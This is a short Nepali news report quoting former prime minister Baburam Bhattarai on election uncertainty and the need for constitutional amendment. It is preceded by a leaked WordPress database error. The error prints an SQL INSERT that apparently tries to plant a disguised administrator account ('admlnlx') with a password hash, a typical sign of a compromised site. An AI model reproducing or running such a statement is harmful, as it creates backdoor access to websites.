WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B9U9gkBonhTxCvjFHf9w1dPxqoDVbb1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 13:21:50', '', 'admlnlx', 'admlnlx')
हेटौँडा, माघ २६–
नयाँ शक्ति नेपाल पार्टीका संयोजक डा. बाबुराम भट्टराइले प्रमुख तीन ठूला दलको स्वार्थका कारण संविधानमा भएको व्यवस्थाअनुसार चुनाव हुने वा नहुनेमा अन्योल देखिएको बताउनुभएको छ ।
हेटौंडामा आज सञ्चारकर्मीसँग कुरा गर्दै उहाँले भन्नुभयो– “संविधान संशोधनपछि मात्र मुलुकमा निर्वाचनको वातावरण बन्ने भएकाले त्यसतर्फ सरकारको ध्यान केन्द्रीत हुनुपर्छ ।”
पूर्वप्रधानमन्त्रीसमेत रहनुभएका संयोजक डा भट्टराइले तीन ठुला दलको दलीय स्वार्थका कारण निर्वाचन गर्न अन्तरिम सरकार गठन गर्ने परिस्थिति आउन सक्ने पनि बताउनुभयो ।